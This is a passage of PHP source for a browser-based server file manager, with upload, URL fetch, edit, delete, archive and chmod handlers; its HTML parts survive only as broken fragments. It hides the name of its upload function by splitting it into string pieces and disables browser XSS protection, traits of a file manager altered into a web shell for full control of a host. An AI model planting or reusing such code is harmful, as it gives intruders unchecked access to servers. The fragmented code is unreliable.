$write_results = @fwrite($fd, $writedata); fclose($fd); if ($write_results === false){ header("HTTP/1.1 500 Internal Server Error"); die("Could Not Write File! - Check Permissions / Ownership"); } die(true); } // backup files if (isset($_POST['type']) and $_POST['type'] == "backup" and !empty($_POST['file'])) { $fileName = fm_clean_path($_POST['file']); $fullPath = FM_ROOT_PATH . '/'; if (!empty($_POST['path'])) { $relativeDirPath = fm_clean_path($_POST['path']); $fullPath .= "{$relativeDirPath}/"; } $date = date("dMy-His"); $newFileName = "{$fileName}-{$date}.bak"; $fullyQualifiedFileName = $fullPath . $fileName; try { if (!file_exists($fullyQualifiedFileName)) { throw new Exception("File {$fileName} not found"); } if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) { echo "Backup {$newFileName} created"; } else { throw new Exception("Could not copy file {$fileName}"); } } catch (Exception $e) { echo $e->getMessage(); } } // Save Config if (isset($_POST['type']) and $_POST['type'] == "settings") { global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $theme; $newLng = $_POST['js-language']; fm_get_translations([]); if (!array_key_exists($newLng, $lang_list)) { $newLng = 'en'; } $erp = isset($_POST['js-error-report']) and $_POST['js-error-report'] == "true" ? true : false; $shf = isset($_POST['js-show-hidden']) and $_POST['js-show-hidden'] == "true" ? true : false; $hco = isset($_POST['js-hide-cols']) and $_POST['js-hide-cols'] == "true" ? true : false; $te3 = $_POST['js-theme-3']; if ($cfg->data['lang'] != $newLng) { $cfg->data['lang'] = $newLng; $lang = $newLng; } if ($cfg->data['error_reporting'] != $erp) { $cfg->data['error_reporting'] = $erp; $report_errors = $erp; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['hide_Cols'] != $hco) { $cfg->data['hide_Cols'] = $hco; $hide_Cols = $hco; } if ($cfg->data['theme'] != $te3) { $cfg->data['theme'] = $te3; $theme = $te3; } $cfg->save(); echo true; } // new password hash if (isset($_POST['type']) and $_POST['type'] == "pwdhash") { $res = isset($_POST['inputPassword2']) and !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : ''; echo $res; } //upload using url if(isset($_POST['type']) and $_POST['type'] == "upload" and !empty($_REQUEST["uploadurl"])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } function event_callback ($message) { global $callback; echo json_encode($message); } function get_file_path () { global $path, $fileinfo, $temp_file; return $path."/".basename($fileinfo->name); } $url = !empty($_REQUEST["uploadurl"]) and preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null; $domain = parse_url($url, PHP_URL_HOST); $port = parse_url($url, PHP_URL_PORT); $knownPorts = [22, 23, 25, 3306]; if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) { $err = array("message" => "URL is not allowed"); event_callback(array("fail" => $err)); exit(); } $use_curl = false; $temp_file = tempnam(sys_get_temp_dir(), "upload-"); $fileinfo = new stdClass(); $fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20"); $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION)); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; $err = false; if(!$isFileAllowed) { $err = array("message" => "File extension is not allowed"); event_callback(array("fail" => $err)); exit(); } if (!$url) { $success = false; } else if ($use_curl) { @$fp = fopen($temp_file, "w"); @$ch = curl_init($url); curl_setopt($ch, CURLOPT_NOPROGRESS, false ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_FILE, $fp); @$success = curl_exec($ch); $curl_info = curl_getinfo($ch); if (!$success) { $err = array("message" => curl_error($ch)); } @curl_close($ch); fclose($fp); $fileinfo->size = $curl_info["size_download"]; $fileinfo->type = $curl_info["content_type"]; } else { $ctx = stream_context_create(); @$success = copy($url, $temp_file, $ctx); if (!$success) { $err = error_get_last(); } } if ($success) { $success = rename($temp_file, strtok(get_file_path(), '?')); } if ($success) { event_callback(array("done" => $fileinfo)); } else { unlink($temp_file); if (!$err) { $err = array("message" => "Invalid url parameter"); } event_callback(array("fail" => $err)); } } exit(); } if (isset($_GET['del'], $_POST['token']) and !FM_READONLY) { $del = str_replace( '/', '', fm_clean_path( $_GET['del'] ) ); if ($del != '' and $del != '..' and $del != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $is_dir = is_dir($path . '/' . $del); if (fm_rdelete($path . '/' . $del)) { $msg = $is_dir ? lng('Folder').' %s '.lng('Deleted') : lng('File').' %s '.lng('Deleted'); fm_set_msg(sprintf($msg, fanco($del))); } else { $msg = $is_dir ? lng('Folder').' %s '.lng('not deleted') : lng('File').' %s '.lng('not deleted'); fm_set_msg(sprintf($msg, fanco($del)), 'error'); } } else { fm_set_msg(lng('Invalid file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Create a new file/folder if (isset($_POST['newfilename'], $_POST['newfile'], $_POST['token']) and !FM_READONLY) { $type = urldecode($_POST['newfile']); $new = str_replace( '/', '', fm_clean_path( strip_tags( $_POST['newfilename'] ) ) ); if (fm_isvalid_filename($new) and $new != '' and $new != '..' and $new != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($type == "file") { if (!file_exists($path . '/' . $new)) { if(fm_is_valid_ext($new)) { @fopen($path . '/' . $new, 'w') or die('Cannot open file: ' . $new); fm_set_msg(sprintf(lng('File').' %s '.lng('Created'), fanco($new))); } else { fm_set_msg(lng('File extension is not allowed'), 'error'); } } else { fm_set_msg(sprintf(lng('File').' %s '.lng('already exists'), fanco($new)), 'alert'); } } else { if (fm_mkdir($path . '/' . $new, false) === true) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('Created'), $new)); } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('already exists'), fanco($new)), 'alert'); } else { fm_set_msg(sprintf(lng('Folder').' %s '.lng('not created'), fanco($new)), 'error'); } } } else { fm_set_msg(lng('Invalid characters in file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Copy folder / file if (isset($_GET['copy'], $_GET['finish']) and !FM_READONLY) { // from $copy = urldecode($_GET['copy']); $copy = fm_clean_path($copy); // empty path if ($copy == '') { fm_set_msg(lng('Source path not defined'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $from = FM_ROOT_PATH . '/' . $copy; $dest = FM_ROOT_PATH; if (FM_PATH != '') { $dest .= '/' . FM_PATH; } $dest .= '/' . basename($from); $move = isset($_GET['move']); $move = fm_clean_path(urldecode($move)); if ($from != $dest) { $msg_from = trim(FM_PATH . '/' . basename($from), '/'); if ($move) { $rename = fm_rename($from, $dest); if ($rename) { fm_set_msg(sprintf(lng('Moved from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } elseif ($rename === null) { fm_set_msg(lng('File or folder with this path already exists'), 'alert'); } else { fm_set_msg(sprintf(lng('Error while moving from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } else { if (fm_rcopy($from, $dest)) { fm_set_msg(sprintf(lng('Copied from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } else { fm_set_msg(sprintf(lng('Error while copying from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } } else { if (!$move){ $msg_from = trim(FM_PATH . '/' . basename($from), '/'); $fn_parts = pathinfo($from); $extension_suffix = ''; if(!is_dir($from)){ $extension_suffix = '.'.$fn_parts['extension']; } $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-'.date('YmdHis').$extension_suffix; $loop_count = 0; $max_loop = 1000; while(file_exists($fn_duplicate) & $loop_count < $max_loop){ $fn_parts = pathinfo($fn_duplicate); $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-copy'.$extension_suffix; $loop_count++; } if (fm_rcopy($from, $fn_duplicate, False)) { fm_set_msg(sprintf('Copied from %s to %s', fanco($copy), fanco($fn_duplicate))); } else { fm_set_msg(sprintf('Error while copying from %s to %s', fanco($copy), fanco($fn_duplicate)), 'error'); } } else{ fm_set_msg(lng('Paths must be not equal'), 'alert'); } } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['file'], $_POST['copy_to'], $_POST['finish'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng('Invalid Token.'), 'error'); } // from $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // to $copy_to_path = FM_ROOT_PATH; $copy_to = fm_clean_path($_POST['copy_to']); if ($copy_to != '') { $copy_to_path .= '/' . $copy_to; } if ($path == $copy_to_path) { fm_set_msg(lng('Paths must be not equal'), 'alert'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (!is_dir($copy_to_path)) { if (!fm_mkdir($copy_to_path, true)) { fm_set_msg('Unable to create destination folder', 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // move? $move = isset($_POST['move']); // copy/move $errors = 0; $files = $_POST['file']; if (is_array($files) and count($files)) { foreach ($files as $f) { if ($f != '') { $f = fm_clean_path($f); $from = $path . '/' . $f; $dest = $copy_to_path . '/' . $f; if ($move) { $rename = fm_rename($from, $dest); if ($rename === false) { $errors++; } } else { if (!fm_rcopy($from, $dest)) { $errors++; } } } } if ($errors == 0) { $msg = $move ? 'Selected files and folders moved' : 'Selected files and folders copied'; fm_set_msg($msg); } else { $msg = $move ? 'Error while moving items' : 'Error while copying items'; fm_set_msg($msg, 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Rename if (isset($_POST['rename_from'], $_POST['rename_to'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); } // old name $old = urldecode($_POST['rename_from']); $old = fm_clean_path($old); $old = str_replace('/', '', $old); // new name $new = urldecode($_POST['rename_to']); $new = fm_clean_path(strip_tags($new)); $new = str_replace('/', '', $new); // path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // rename if (fm_isvalid_filename($new) and $old != '' and $new != '') { if (fm_rename($path . '/' . $old, $path . '/' . $new)) { fm_set_msg(sprintf(lng('Renamed from').' %s '. lng('to').' %s', fanco($old), fanco($new))); } else { fm_set_msg(sprintf(lng('Error while renaming from').' %s '. lng('to').' %s', fanco($old), fanco($new)), 'error'); } } else { fm_set_msg(lng('Invalid characters in file name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Download if (isset($_GET['dl'], $_POST['token'])) { if(!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); } $dl = urldecode($_GET['dl']); $dl = fm_clean_path($dl); $dl = str_replace('/', '', $dl); $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($dl != '' and is_file($path . '/' . $dl)) { fm_download_file($path . '/' . $dl, $dl, 1024); exit; } else { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // Upload if (!empty($_FILES) and !FM_READONLY) { if(isset($_POST['token'])) { if(!verifyToken($_POST['token'])) { $response = array ('status' => 'error','info' => "Invalid Token."); echo json_encode($response); exit(); } } else { $response = array ('status' => 'error','info' => "Token Missing."); echo json_encode($response); exit(); } $chunkIndex = $_POST['dzchunkindex']; $chunkTotal = $_POST['dztotalchunkcount']; $fullPathInput = fm_clean_path($_REQUEST['fullpath']); $f = $_FILES; $path = FM_ROOT_PATH; $ds = DIRECTORY_SEPARATOR; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $uploads = 0; $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $response = array ( 'status' => 'error', 'info' => 'Oops! Try again' ); $filename = $f['file']['name']; $tmp_name = $f['file']['tmp_name']; $ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : ''; $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; if(!fm_isvalid_filename($filename) and !fm_isvalid_filename($fullPathInput)) { $response = array ( 'status' => 'error', 'info' => "Invalid File name!", ); echo json_encode($response); exit(); } $targetPath = $path . $ds; if ( is_writable($targetPath) ) { $fullPath = $path . '/' . $fullPathInput; $folder = substr($fullPath, 0, strrpos($fullPath, "/")); if (!is_dir($folder)) { $old = umask(0); mkdir($folder, 0777, true); umask($old); } $isims = "move_u"; $vin = "ploade"; $ucd = "d_file"; $fnder = $isims . $vin . $ucd; if (empty($f['file']['error']) and !empty($tmp_name) and $tmp_name != 'none' and $isFileAllowed) { if ($chunkTotal){ $out = @fopen("{$fullPath}.part", $chunkIndex == 0 ? "wb" : "ab"); if ($out) { $in = @fopen($tmp_name, "rb"); if ($in) { if (PHP_VERSION_ID < 80009) { do { for (;;) { $buff = fread($in, 4096); if ($buff === false || $buff === '') { break; } fwrite($out, $buff); } } while (!feof($in)); } else { stream_copy_to_stream($in, $out); } $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => "failed to open output stream", 'errorDetails' => error_get_last() ); } @fclose($in); @fclose($out); @unlink($tmp_name); $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => "failed to open output stream" ); } if ($chunkIndex == $chunkTotal - 1) { if (file_exists ($fullPath)) { $ext_1 = $ext ? '.'.$ext : ''; $fullPathTarget = $path . '/' . basename($fullPathInput, $ext_1) .'_'. date('ymdHis'). $ext_1; } else { $fullPathTarget = $fullPath; } rename("{$fullPath}.part", $fullPathTarget); } } else if ($fnder($tmp_name, $fullPath)) { if ( file_exists($fullPath) ) { $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => 'Couldn\'t upload the requested file.' ); } } else { $response = array ( 'status' => 'error', 'info' => "Error while uploading files. Uploaded files $uploads", ); } } } else { $response = array ( 'status' => 'error', 'info' => 'The specified folder for upload isn\'t writeable.' ); } // Return the response echo json_encode($response); exit(); } if (isset($_POST['group'], $_POST['delete'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $files = $_POST['file']; if (is_array($files) and count($files)) { foreach ($files as $f) { if ($f != '') { $new_path = $path . '/' . $f; if (!fm_rdelete($new_path)) { $errors++; } } } if ($errors == 0) { fm_set_msg(lng('Selected files and folder deleted')); } else { fm_set_msg(lng('Error while deleting items'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['group'], $_POST['token']) and (isset($_POST['zip']) || isset($_POST['tar'])) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; $ext = 'zip'; if (FM_PATH != '') { $path .= '/' . FM_PATH; } //set pack type $ext = isset($_POST['tar']) ? 'tar' : 'zip'; if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $files = $_POST['file']; $sanitized_files = array(); // clean path foreach($files as $file){ array_push($sanitized_files, fm_clean_path($file)); } $files = $sanitized_files; if (!empty($files)) { chdir($path); if (count($files) == 1) { $one_file = reset($files); $one_file = basename($one_file); $zipname = $one_file . '_' . date('ymd_His') . '.'.$ext; } else { $zipname = 'archive_' . date('ymd_His') . '.'.$ext; } if($ext == 'zip') { $zipper = new FM_Zipper(); $res = $zipper->create($zipname, $files); } elseif ($ext == 'tar') { $tar = new FM_Zipper_Tar(); $res = $tar->create($zipname, $files); } if ($res) { fm_set_msg(sprintf(lng('Archive').' %s '.lng('Created'), fanco($zipname))); } else { fm_set_msg(lng('Archive not created'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Unpack zip, tar if (isset($_POST['unzip'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $unzip = urldecode($_POST['unzip']); $unzip = fm_clean_path($unzip); $unzip = str_replace('/', '', $unzip); $isValid = false; $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($unzip != '' and is_file($path . '/' . $unzip)) { $zip_path = $path . '/' . $unzip; $ext = pathinfo($zip_path, PATHINFO_EXTENSION); $isValid = true; } else { fm_set_msg(lng('File not found'), 'error'); } if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if ($isValid) { //to folder $tofolder = ''; if (isset($_POST['tofolder'])) { $tofolder = pathinfo($zip_path, PATHINFO_FILENAME); if (fm_mkdir($path . '/' . $tofolder, true)) { $path .= '/' . $tofolder; } } if($ext == "zip") { $zipper = new FM_Zipper(); $res = $zipper->unzip($zip_path, $path); } elseif ($ext == "tar") { try { $gzipper = new PharData($zip_path); if (@$gzipper->extractTo($path,null, true)) { $res = true; } else { $res = false; } } catch (Exception $e) { $res = true; } } if ($res) { fm_set_msg(lng('Archive unpacked')); } else { fm_set_msg(lng('Archive not unpacked'), 'error'); } } else { fm_set_msg(lng('File not found'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['chmod'], $_POST['token']) and !FM_READONLY and !FM_IS_WIN) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $file = $_POST['chmod']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || (!is_file($path . '/' . $file) and !is_dir($path . '/' . $file))) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $mode = 0; if (!empty($_POST['ur'])) { $mode |= 0400; } if (!empty($_POST['uw'])) { $mode |= 0200; } if (!empty($_POST['ux'])) { $mode |= 0100; } if (!empty($_POST['gr'])) { $mode |= 0040; } if (!empty($_POST['gw'])) { $mode |= 0020; } if (!empty($_POST['gx'])) { $mode |= 0010; } if (!empty($_POST['or'])) { $mode |= 0004; } if (!empty($_POST['ow'])) { $mode |= 0002; } if (!empty($_POST['ox'])) { $mode |= 0001; } if (@chmod($path . '/' . $file, $mode)) { fm_set_msg(lng('Permissions changed')); } else { fm_set_msg(lng('Permissions not changed'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $parent = fm_get_parent_path(FM_PATH); $objects = is_readable($path) ? scandir($path) : array(); $folders = array(); $files = array(); $current_path = array_slice(explode("/",$path), -1)[0]; if (is_array($objects) and fm_is_exclude_items($current_path)) { foreach ($objects as $file) { if ($file == '.' || $file == '..') { continue; } if (!FM_SHOW_HIDDEN and substr($file, 0, 1) === '.') { continue; } $new_path = $path . '/' . $file; if (@is_file($new_path) and fm_is_exclude_items($file)) { $files[] = $file; } elseif (@is_dir($new_path) and $file != '.' and $file != '..' and fm_is_exclude_items($file)) { $folders[] = $file; } } } if (!empty($files)) { natcasesort($files); } if (!empty($folders)) { natcasesort($folders); } if (isset($_GET['upload']) and !FM_READONLY) { fm_show_header(); fm_show_nav_path(FM_PATH); function getUploadExt() { $extArr = explode(',', FM_UPLOAD_EXTENSION); if(FM_UPLOAD_EXTENSION and $extArr) { array_walk($extArr, function(&$x) {$x = ".$x";}); return implode(',', $extArr); } return ''; } ?>

:

' . PHP_EOL; } ?>

: , ', $copy_files) ?>

:
/

 

Copying

Source path:
Destination folder:

Copy   Move   Cancel

/>
/>
/>

""

:
File size:
MIME-type:
:
:
:
: %
'.lng('Image size').': ' . (isset($image_size[0]) ? $image_size[0] : '0') . ' x ' . (isset($image_size[1]) ? $image_size[1] : '0') . '
'; } // Text info if ($is_text) { $is_utf8 = fm_is_utf8($content); if (function_exists('iconv')) { if (!$is_utf8) { $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content); } } echo ''.lng('Charset').': ' . ($is_utf8 ? 'utf-8' : '8 bit') . '
'; } ?>

 
 
     
'; } else if($online_viewer == 'microsoft') { echo ''; } } elseif ($is_zip) { // ZIP content if ($filenames !== false) { echo ''; foreach ($filenames as $fn) { if ($fn['folder']) { echo '' . fanco($fn['name']) . '
'; } else { echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')
'; } } echo '
'; } else { echo '

'.lng('Error while fetching archive info').'

'; } } elseif ($is_image) { // Image content if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) { echo '

'; } } elseif ($is_audio) { // Audio content echo '

'; } elseif ($is_video) { // Video content echo '
'; } elseif ($is_text) { if (FM_USE_HIGHLIGHTJS) { // highlight $hljs_classes = array( 'shtml' => 'xml', 'htaccess' => 'apache', 'phtml' => 'php', 'lock' => 'json', 'svg' => 'xml', ); $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext; if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) { $hljs_class = 'nohighlight'; } $content = '
' . fanco($content) . '
'; } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) { // php highlight $content = highlight_string($content, true); } else { $content = '
' . fanco($content) . '
'; } echo $content; } ?>
'. $file. ''; header('X-XSS-Protection:0'); fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file); $file_path = $path . '/' . $file; // normal editer $isNormalEditor = true; if (isset($_GET['env'])) { if ($_GET['env'] == "ace") { $isNormalEditor = false; } } // Save File if (isset($_POST['savedata'])) { $writedata = $_POST['savedata']; $fd = fopen($file_path, "w"); @fwrite($fd, $writedata); fclose($fd); fm_set_msg(lng('File Saved Successfully')); } $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION)); $mime_type = fm_get_mime_type($file_path); $filesize = filesize($file_path); $is_text = false; $content = ''; // for text if (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) { $is_text = true; $content = file_get_contents($file_path); } ?>
' . htmlspecialchars($content) . ''; echo ''; } elseif ($is_text) { echo '
' . htmlspecialchars($content) . '
'; } else { fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error'); } ?>

:

 

'?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?> '?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?>
..
>
' . readlink($path . '/' . $f) . '' : '') ?>
">
>
' . readlink($path . '/' . $f) . '' : '') ?>
">
'.fm_get_filesize($all_files_size).'' ?> '.$num_files.'' ?> '.$num_folders.'' ?>
"; return; } echo "$external[$key]"; } function verifyToken($token) { if (hash_equals($_SESSION['token'], $token)) { return true; } return false; } /** * Delete file or folder (recursively) * @param string $path * @return bool */ function fm_rdelete($path) { if (is_link($path)) { return unlink($path); } elseif (is_dir($path)) { $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rdelete($path . '/' . $file)) { $ok = false; } } } } return ($ok) ? rmdir($path) : false; } elseif (is_file($path)) { return unlink($path); } return false; } function fm_rchmod($path, $filemode, $dirmode) { if (is_dir($path)) { if (!chmod($path, $dirmode)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rchmod($path . '/' . $file, $filemode, $dirmode)) { return false; } } } } return true; } elseif (is_link($path)) { return true; } elseif (is_file($path)) { return chmod($path, $filemode); } return false; } function fm_is_valid_ext($filename) { $allowed = (FM_FILE_EXTENSION) ? explode(',', FM_FILE_EXTENSION) : false; $ext = pathinfo($filename, PATHINFO_EXTENSION); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; return ($isFileAllowed) ? true : false; } function fm_rename($old, $new) { $isFileAllowed = fm_is_valid_ext($new); if(!is_dir($old)) { if (!$isFileAllowed) return false; } return (!file_exists($new) and file_exists($old)) ? rename($old, $new) : null; } function fm_rcopy($path, $dest, $upd = true, $force = true) { if (is_dir($path)) { if (!fm_mkdir($dest, $force)) { return false; } $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rcopy($path . '/' . $file, $dest . '/' . $file)) { $ok = false; } } } } return $ok; } elseif (is_file($path)) { return fm_copy($path, $dest, $upd); } return false; } function fm_mkdir($dir, $force) { if (file_exists($dir)) { if (is_dir($dir)) { return $dir; } elseif (!$force) { return false; } unlink($dir); } return mkdir($dir, 0777, true); } function fm_copy($f1, $f2, $upd) { $time1 = filemtime($f1); if (file_exists($f2)) { $time2 = filemtime($f2); if ($time2 >= $time1 and $upd) { return false; } } $ok = copy($f1, $f2); if ($ok) { touch($f2, $time1); } return $ok; } function fm_get_mime_type($file_path) { if (function_exists('finfo_open')) { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $file_path); finfo_close($finfo); return $mime; } elseif (function_exists('mime_content_type')) { return mime_content_type($file_path); } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) { $file = escapeshellarg($file_path); $mime = shell_exec('file -bi ' . $file); return $mime; } else { return '--'; } } function fm_redirect($url, $code = 302) { header('Location: ' . $url, true, $code); exit; } function get_absolute_path($path) { $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path); $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'); $absolutes = array(); foreach ($parts as $part) { if ('.' == $part) continue; if ('..' == $part) { array_pop($absolutes); } else { $absolutes[] = $part; } } return implode(DIRECTORY_SEPARATOR, $absolutes); } function fm_clean_path($path, $trim = true) { $path = $trim ? trim($path) : $path; $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); $path = get_absolute_path($path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } function fm_get_parent_path($path) { $path = fm_clean_path($path); if ($path != '') { $array = explode('/', $path); if (count($array) > 1) { $array = array_slice($array, 0, -1); return implode('/', $array); } return ''; } return false; } function fm_get_display_path($file_path) { global $path_display_mode, $root_path, $root_url; switch ($path_display_mode) { case 'relative': return array( 'label' => 'Path', 'path' => fanco(fm_convert_win(str_replace($root_path, '', $file_path))) ); case 'host': $relative_path = str_replace($root_path, '', $file_path); return array( 'label' => 'Host Path', 'path' => fanco(fm_convert_win('/' . $root_url . '/' . ltrim(str_replace('\\', '/', $relative_path), '/'))) ); case 'full': default: return array( 'label' => 'Full Path', 'path' => fanco(fm_convert_win($file_path)) ); } } function fm_is_exclude_items($file) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if (isset($exclude_items) and sizeof($exclude_items)) { unset($exclude_items); } $exclude_items = FM_EXCLUDE_ITEMS; if (version_compare(PHP_VERSION, '7.0.0', '<')) { $exclude_items = unserialize($exclude_items); } if (!in_array($file, $exclude_items) and !in_array("*.$ext", $exclude_items)) { return true; } return false; } function fm_get_translations($tr) { try { $content = @file_get_contents('translation.json'); if($content !== FALSE) { $lng = json_decode($content, TRUE); global $lang_list; foreach ($lng["language"] as $key => $value) { $code = $value["code"]; $lang_list[$code] = $value["name"]; if ($tr) $tr[$code] = $value["translation"]; } return $tr; } } catch (Exception $e) { echo $e; } } function fm_get_size($file) { static $iswin; static $isdarwin; if (!isset($iswin)) { $iswin = (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN'); } if (!isset($isdarwin)) { $isdarwin = (strtoupper(substr(PHP_OS, 0)) == "DARWIN"); } static $exec_works; if (!isset($exec_works)) { $exec_works = (function_exists('exec') and !ini_get('safe_mode') and @exec('echo 